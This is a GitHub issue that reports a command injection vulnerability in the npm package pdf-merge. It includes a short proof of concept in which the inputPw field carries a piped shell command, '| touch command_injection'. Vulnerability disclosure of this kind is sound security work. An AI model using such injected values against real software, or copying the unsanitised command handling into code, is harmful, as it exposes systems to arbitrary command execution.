wubzz / pdf-merge

Merge multiple PDF Files into a single PDF document
127 stars 32 forks

Potential command injection vulnerability in pdf-merge #42

Open qCVE opened 2 years ago

qCVE commented 2 years ago

Hi,

Thanks for developing this great npm package! We found a potential command injection vulnerability in it. The bug is introduced because the package-exported method fails to sanitize the inputPw parameter and lets it flow into a sensitive command execution API.

Here is the proof of concept.

const PDFMerge = require('pdf-merge');
const files = [
    `${__dirname}/1.pdf`,
    `${__dirname}/2.pdf`,
    {file: `${__dirname}/protected.pdf`, inputPw: '_SeCrEt_ | touch command_injection'}
];

PDFMerge(files);